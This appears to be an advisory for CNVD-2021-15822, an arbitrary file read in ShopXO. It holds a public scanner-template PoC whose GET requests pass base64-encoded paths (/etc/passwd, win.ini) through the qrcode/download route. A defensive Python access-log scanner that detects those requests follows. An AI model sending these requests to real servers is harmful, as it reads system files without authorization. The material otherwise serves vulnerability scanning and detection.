CNVD-2021-15822: ShopXO Arbitrary File Read Vulnerability

Date: 2025-09-01 | Affected software: unknown | PoC: public

Vulnerability description

ShopXO has a file read vulnerability that an attacker can use to read sensitive files on the system.

PoC code [public]

id: CNVD-2021-15822

info:
  name: ShopXO 任意文件读取漏洞
  author: Print1n
  severity: high
  description: |-
    ShopXO 存在文件读取漏洞,攻击者可通过该漏洞读取系统敏感文件。
  reference:
    - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-15822
  tags: shopxo,cnvd,cnvd2021,fileread
  created: 2021/10/23

rules:
  Linux0:
    request:
      method: GET
      path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  Windows0:
    request:
      method: GET
      path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ=
    expression: |
      response.status == 200 &&
      response.body.ibcontains(b"[fonts]") &&
      response.body.ibcontains(b"[extensions]")
expression: Linux0() || Windows0()
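Defender-side counterpart to the PoC above, added here as an example that is not part of the original page or of ShopXO: it decodes the base64 segment of the qrcode/download route in web-server access logs and flags requests whose decoded value is a local path instead of an http(s) URL. The combined-log format and the assumption that the route is only meant to fetch remote image URLs are mine.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlparse

# The ShopXO route from the PoC: the last segment is the base64-encoded "url" value.
ROUTE_RE = re.compile(r"^/index/qrcode/download/url/([A-Za-z0-9+/=_-]+)$", re.I)
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request line in a combined log

def decode_url_param(token: str):
    """Decode the base64 segment, tolerating URL-safe alphabet and stripped padding."""
    token = unquote(token).replace("-", "+").replace("_", "/")
    token += "=" * (-len(token) % 4)
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None

def is_local_file_read(decoded: str) -> bool:
    """The route is meant to fetch a remote image, so a non-http(s) target is a file-read attempt."""
    return urlparse(decoded).scheme.lower() not in ("http", "https")

def inspect_request_path(path: str):
    """Return a finding for a qrcode/download request whose decoded url is a local path, else None."""
    parsed = urlparse(path)
    s_values = parse_qs(parsed.query).get("s", [])
    if not parsed.path.endswith("index.php") or not s_values:
        return None
    m = ROUTE_RE.match(s_values[0])
    if not m:
        return None
    decoded = decode_url_param(m.group(1))
    if decoded is None or not is_local_file_read(decoded):
        return None
    return {"route": s_values[0], "decoded_url": decoded}

def scan_access_log(lines) -> list:
    """Run the check over access-log lines and return one finding per matching request."""
    findings = []
    for line in lines:
        m = REQ_RE.search(line)
        finding = inspect_request_path(m.group(1)) if m else None
        if finding:
            findings.append(finding)
    return findings

# Constructed sample access-log lines (not from a real deployment); the two
# local-path base64 tokens are the ones used by the PoC above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2025:10:00:01 +0000] "GET /public/index.php?s=/index/qrcode/download/url/aHR0cHM6Ly9leGFtcGxlLmNvbS9pbWcucG5n HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Sep/2025:10:00:02 +0000] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q%3D HTTP/1.1" 200 1843',
    '10.0.0.9 - - [01/Sep/2025:10:00:03 +0000] "GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1" 200 92',
]
```

The first sample line is a legitimate remote-image request and produces no finding; the other two are the PoC paths and are reported with their decoded targets.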